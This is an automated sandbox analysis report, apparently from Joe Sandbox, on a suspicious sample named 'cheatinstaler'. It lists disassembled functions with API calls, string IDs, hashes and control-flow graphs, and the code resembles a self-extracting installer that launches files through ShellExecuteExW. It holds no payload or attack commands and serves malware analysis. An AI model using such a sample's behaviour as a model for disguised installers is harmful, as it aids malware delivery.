                                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                  • API String ID: 1496594111-2013832382
                                                                                  • Opcode ID: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
                                                                                  • Instruction ID: d7f15725ad6101325c78df3831694dd9c0a0acff89d676260a091e1b8d1de47c
                                                                                  • Opcode Fuzzy Hash: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
                                                                                  • Instruction Fuzzy Hash: 00321E31A09B8295FB21AF62E8A01E9B3A4FF44354FE80236DA4D47765EF3CD255C760
                                                                                  Function 00007FF7545598DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF754558E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF754558F8D
                                                                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF754559F75
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75455A42F
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75455A435
                                                                                    • Part of subcall function 00007FF754560BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF754560B44), ref: 00007FF754560BE9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                  • API String ID: 3629253777-3268106645
                                                                                  • Opcode ID: d5e184d1739c57cd0f07290b4b435b9f8b6515e69c147f3d5d8e6c96380bb7e8
                                                                                  • Instruction ID: 6644983dcb0b57c4684b5d2380818795936753300e591fb451570e34cc82e074
                                                                                  • Opcode Fuzzy Hash: d5e184d1739c57cd0f07290b4b435b9f8b6515e69c147f3d5d8e6c96380bb7e8
                                                                                  • Instruction Fuzzy Hash: D862AF62B1968295EB10EF26D4E82FDA3A1FB40784FC84131EA4D47695EF3CE945C760
                                                                                  Function 00007FF754571900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1911 7ff754571900-7ff754571989 call 7ff754571558 1914 7ff75457198b-7ff7545719af call 7ff754571868 RaiseException 1911->1914 1915 7ff7545719b4-7ff7545719d1 1911->1915 1921 7ff754571bb8-7ff754571bd5 1914->1921 1917 7ff7545719e6-7ff7545719ea 1915->1917 1918 7ff7545719d3-7ff7545719e4 1915->1918 1920 7ff7545719ed-7ff7545719f9 1917->1920 1918->1920 1922 7ff7545719fb-7ff754571a0d 1920->1922 1923 7ff754571a1a-7ff754571a1d 1920->1923 1931 7ff754571b89-7ff754571b93 1922->1931 1932 7ff754571a13 1922->1932 1924 7ff754571a23-7ff754571a26 1923->1924 1925 7ff754571ac4-7ff754571acb 1923->1925 1929 7ff754571a3d-7ff754571a52 LoadLibraryExA 1924->1929 1930 7ff754571a28-7ff754571a3b 1924->1930 1927 7ff754571acd-7ff754571adc 1925->1927 1928 7ff754571adf-7ff754571ae2 1925->1928 1927->1928 1933 7ff754571ae8-7ff754571aec 1928->1933 1934 7ff754571b85 1928->1934 1935 7ff754571aa9-7ff754571ab2 1929->1935 1936 7ff754571a54-7ff754571a67 GetLastError 1929->1936 1930->1929 1930->1935 1943 7ff754571b95-7ff754571ba6 1931->1943 1944 7ff754571bb0 call 7ff754571868 1931->1944 1932->1923 1941 7ff754571aee-7ff754571af2 1933->1941 1942 7ff754571b1b-7ff754571b2e GetProcAddress 1933->1942 1934->1931 1937 7ff754571abd 1935->1937 1938 7ff754571ab4-7ff754571ab7 FreeLibrary 1935->1938 1945 7ff754571a7e-7ff754571aa4 call 7ff754571868 RaiseException 1936->1945 1946 7ff754571a69-7ff754571a7c 1936->1946 1937->1925 1938->1937 1941->1942 1947 7ff754571af4-7ff754571aff 1941->1947 1942->1934 1950 7ff754571b30-7ff754571b43 GetLastError 1942->1950 1943->1944 1955 7ff754571bb5 1944->1955 1945->1921 1946->1935 1946->1945 1947->1942 1953 7ff754571b01-7ff754571b08 1947->1953 1951 7ff754571b5a-7ff754571b81 call 7ff754571868 RaiseException call 7ff754571558 1950->1951 1952 7ff754571b45-7ff754571b58 1950->1952 1951->1934 1952->1934 1952->1951 1953->1942 1958 7ff754571b0a-7ff754571b0f 1953->1958 1955->1921 1958->1942 1961 7ff754571b11-7ff754571b19 1958->1961 1961->1934 1961->1942
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                  • String ID: H
                                                                                  • API String ID: 3432403771-2852464175
                                                                                  • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                  • Instruction ID: 545a80340e03340c1be3b0d4d7aad7440d50489c2d68279d62da3bb5b95fc877
                                                                                  • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                  • Instruction Fuzzy Hash: 00916A32A05B128AFB10EF66D8946A8B3B5FB08B98F9C4135DE0E17754EF38E545C360
                                                                                  Function 00007FF75456F4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1991 7ff75456f4e0-7ff75456f523 1992 7ff75456f529-7ff75456f565 call 7ff754573cf0 1991->1992 1993 7ff75456f894-7ff75456f8b9 call 7ff754541fa0 call 7ff754572320 1991->1993 1999 7ff75456f56a-7ff75456f571 1992->1999 2000 7ff75456f567 1992->2000 2002 7ff75456f573-7ff75456f577 1999->2002 2003 7ff75456f582-7ff75456f586 1999->2003 2000->1999 2004 7ff75456f57c-7ff75456f580 2002->2004 2005 7ff75456f579 2002->2005 2006 7ff75456f58b-7ff75456f596 2003->2006 2007 7ff75456f588 2003->2007 2004->2006 2005->2004 2008 7ff75456f59c 2006->2008 2009 7ff75456f628 2006->2009 2007->2006 2010 7ff75456f5a2-7ff75456f5a9 2008->2010 2011 7ff75456f62c-7ff75456f62f 2009->2011 2014 7ff75456f5ae-7ff75456f5b3 2010->2014 2015 7ff75456f5ab 2010->2015 2012 7ff75456f637-7ff75456f63a 2011->2012 2013 7ff75456f631-7ff75456f635 2011->2013 2016 7ff75456f660-7ff75456f673 call 7ff7545563ac 2012->2016 2017 7ff75456f63c-7ff75456f643 2012->2017 2013->2012 2013->2016 2018 7ff75456f5e5-7ff75456f5f0 2014->2018 2019 7ff75456f5b5 2014->2019 2015->2014 2034 7ff75456f698-7ff75456f6ed call 7ff75457797c call 7ff75454129c call 7ff7545532a8 call 7ff754541fa0 2016->2034 2035 7ff75456f675-7ff75456f693 call 7ff7545613c4 2016->2035 2017->2016 2020 7ff75456f645-7ff75456f65c 2017->2020 2022 7ff75456f5f5-7ff75456f5fa 2018->2022 2023 7ff75456f5f2 2018->2023 2024 7ff75456f5ca-7ff75456f5d0 2019->2024 2020->2016 2028 7ff75456f8ba-7ff75456f8c1 2022->2028 2029 7ff75456f600-7ff75456f607 2022->2029 2023->2022 2025 7ff75456f5b7-7ff75456f5be 2024->2025 2026 7ff75456f5d2 2024->2026 2030 7ff75456f5c3-7ff75456f5c8 2025->2030 2031 7ff75456f5c0 2025->2031 2026->2018 2032 7ff75456f8c6-7ff75456f8cb 2028->2032 2033 7ff75456f8c3 2028->2033 2036 7ff75456f60c-7ff75456f612 2029->2036 2037 7ff75456f609 2029->2037 2030->2024 2038 7ff75456f5d4-7ff75456f5db 2030->2038 2031->2030 2039 7ff75456f8cd-7ff75456f8d4 2032->2039 2040 7ff75456f8de-7ff75456f8e6 2032->2040 2033->2032 2058 7ff75456f742-7ff75456f74f ShellExecuteExW 2034->2058 2059 7ff75456f6ef-7ff75456f73d call 7ff75457797c call 7ff75454129c call 7ff754555b60 call 7ff754541fa0 2034->2059 2035->2034 2036->2028 2043 7ff75456f618-7ff75456f622 2036->2043 2037->2036 2044 7ff75456f5dd 2038->2044 2045 7ff75456f5e0 2038->2045 2046 7ff75456f8d9 2039->2046 2047 7ff75456f8d6 2039->2047 2048 7ff75456f8eb-7ff75456f8f6 2040->2048 2049 7ff75456f8e8 2040->2049 2043->2009 2043->2010 2044->2045 2045->2018 2046->2040 2047->2046 2048->2011 2049->2048 2061 7ff75456f755-7ff75456f75f 2058->2061 2062 7ff75456f846-7ff75456f84e 2058->2062 2059->2058 2066 7ff75456f761-7ff75456f764 2061->2066 2067 7ff75456f76f-7ff75456f772 2061->2067 2064 7ff75456f882-7ff75456f88f 2062->2064 2065 7ff75456f850-7ff75456f866 2062->2065 2064->1993 2071 7ff75456f87d call 7ff75457220c 2065->2071 2072 7ff75456f868-7ff75456f87b 2065->2072 2066->2067 2073 7ff75456f766-7ff75456f76d 2066->2073 2068 7ff75456f78e-7ff75456f7ad call 7ff7545ae1b8 call 7ff75456fe24 2067->2068 2069 7ff75456f774-7ff75456f77f call 7ff7545ae188 2067->2069 2074 7ff75456f7e3-7ff75456f7f0 CloseHandle 2068->2074 2099 7ff75456f7af-7ff75456f7b2 2068->2099 2069->2068 2088 7ff75456f781-7ff75456f78c ShowWindow 2069->2088 2071->2064 2072->2071 2078 7ff75456f8fb-7ff75456f903 call 7ff754577904 2072->2078 2073->2067 2073->2074 2084 7ff75456f805-7ff75456f80c 2074->2084 2085 7ff75456f7f2-7ff75456f803 call 7ff7545613c4 2074->2085 2086 7ff75456f82e-7ff75456f830 2084->2086 2087 7ff75456f80e-7ff75456f811 2084->2087 2085->2084 2085->2086 2086->2062 2095 7ff75456f832-7ff75456f835 2086->2095 2087->2086 2094 7ff75456f813-7ff75456f828 2087->2094 2088->2068 2094->2086 2095->2062 2098 7ff75456f837-7ff75456f845 ShowWindow 2095->2098 2098->2062 2099->2074 2101 7ff75456f7b4-7ff75456f7c5 GetExitCodeProcess 2099->2101 2101->2074 2102 7ff75456f7c7-7ff75456f7dc 2101->2102 2102->2074
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: .exe$.inf$Install$p
                                                                                  • API String ID: 1054546013-3607691742
                                                                                  • Opcode ID: c93eaa18019216a85c3e78fe71fcdc46f058aac99f8069240fe2a65e9d023974
                                                                                  • Instruction ID: 529d3a16a4009bb4580dcee78c75933a2263acfc91a57075a2eb89a0aa801d97
                                                                                  • Opcode Fuzzy Hash: c93eaa18019216a85c3e78fe71fcdc46f058aac99f8069240fe2a65e9d023974
                                                                                  • Instruction Fuzzy Hash: 83C18223F18642A5FA10EF27D9E417DA7A2AF857C0F884031EA4D476A9DF3CE851C324
                                                                                  Function 00007FF75456F0A4 Relevance: 16.6, APIs: 11, Instructions: 102COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4119318379-0
                                                                                  • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                  • Instruction ID: cbc7ca4a3d1bebabb031db773e295ef2209c262cf895501b4fadb552b9b3d509
                                                                                  • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                                  • Instruction Fuzzy Hash: B541B332B5464286F700EF63EC60BA973A0EB85B99F881136DD0E07B95CE7DE4458764
                                                                                  Function 00007FF75454EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 39ec4a74e49df8f56e32db411fcadac0f579ee807ced4d6d4e98762d9bdd5929
                                                                                  • Instruction ID: b9f382329a5f5d91a178eb67aaf9e7c6def9f1dc749257854406edfe070544d2
                                                                                  • Opcode Fuzzy Hash: 39ec4a74e49df8f56e32db411fcadac0f579ee807ced4d6d4e98762d9bdd5929
                                                                                  • Instruction Fuzzy Hash: 2212B363F0874285EB10EF6AD4A42BDA371EB457A8F940231EA5D1BAD9DF3CD585C320
                                                                                  Function 00007FF7545524C0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3765 7ff7545524c0-7ff7545524fb 3766 7ff7545524fd-7ff754552504 3765->3766 3767 7ff754552506 3765->3767 3766->3767 3768 7ff754552509-7ff754552578 3766->3768 3767->3768 3769 7ff75455257d-7ff7545525a8 CreateFileW 3768->3769 3770 7ff75455257a 3768->3770 3771 7ff7545525ae-7ff7545525de GetLastError call 7ff754556a0c 3769->3771 3772 7ff754552688-7ff75455268d 3769->3772 3770->3769 3781 7ff75455262c 3771->3781 3782 7ff7545525e0-7ff75455262a CreateFileW GetLastError 3771->3782 3773 7ff754552693-7ff754552697 3772->3773 3775 7ff754552699-7ff75455269c 3773->3775 3776 7ff7545526a5-7ff7545526a9 3773->3776 3775->3776 3778 7ff75455269e 3775->3778 3779 7ff7545526ab-7ff7545526af 3776->3779 3780 7ff7545526cf-7ff7545526e3 3776->3780 3778->3776 3779->3780 3783 7ff7545526b1-7ff7545526c9 SetFileTime 3779->3783 3784 7ff75455270c-7ff754552735 call 7ff754572320 3780->3784 3785 7ff7545526e5-7ff7545526f0 3780->3785 3786 7ff754552632-7ff75455263a 3781->3786 3782->3786 3783->3780 3788 7ff754552708 3785->3788 3789 7ff7545526f2-7ff7545526fa 3785->3789 3790 7ff75455263c-7ff754552653 3786->3790 3791 7ff754552673-7ff754552686 3786->3791 3788->3784 3793 7ff7545526fc 3789->3793 3794 7ff7545526ff-7ff754552703 call 7ff7545420b0 3789->3794 3795 7ff75455266e call 7ff75457220c 3790->3795 3796 7ff754552655-7ff754552668 3790->3796 3791->3773 3793->3794 3794->3788 3795->3791 3796->3795 3797 7ff754552736-7ff75455273b call 7ff754577904 3796->3797
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3536497005-0
                                                                                  • Opcode ID: 3a28dd0dcfd7b89b689d9fe25ecc7464786bdc3a32dccfb94d5fbab1a7314792
                                                                                  • Instruction ID: 97dc57e4239a390f1da74d73ebde8f96fc7b3ba859d6a3415d5110ebeb830ce0
                                                                                  • Opcode Fuzzy Hash: 3a28dd0dcfd7b89b689d9fe25ecc7464786bdc3a32dccfb94d5fbab1a7314792
                                                                                  • Instruction Fuzzy Hash: F461E462A1864185E7249F2AE4903BEA7A1FB847A8F941334EFAD07AD4DF3DD054CB14
                                                                                  Function 00007FF75456B014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                  • String ID: ]
                                                                                  • API String ID: 2347093688-3352871620
                                                                                  • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                  • Instruction ID: 3ef0f3980618c4abdf461477392d60d43e28924f1e274441a32c98885ffaed11
                                                                                  • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                  • Instruction Fuzzy Hash: A1116321B0968251FA64FF23A6F9279E791AF88BD5F8C0434DD5D07B95DE2CE8048620
                                                                                  Function 00007FF75456AE1C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 1266772231-0
                                                                                  • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                  • Instruction ID: 1d803838e3231c83dc947c3e8f6d8e725fec86dbaa8ef7908ccd355b64462f64
                                                                                  • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                  • Instruction Fuzzy Hash: 39F0EC26A3899292FB50AF22E8F9A36A361FFD0706FC85431E54E41854DF2CD908CB20
                                                                                  Function 00007FF7545691E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                  • String ID: EDIT
                                                                                  • API String ID: 4243998846-3080729518
                                                                                  • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                  • Instruction ID: bb308ddfe7e99f00ecc71c76c056239c74b2ad0df5fd4d24c95c035540fbd718
                                                                                  • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                  • Instruction Fuzzy Hash: 00018662B18A8391FA20BF23E8B47B5A390BF98740FCC0131C94D0A654DE2CD149C660
                                                                                  Function 00007FF754552CE0 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
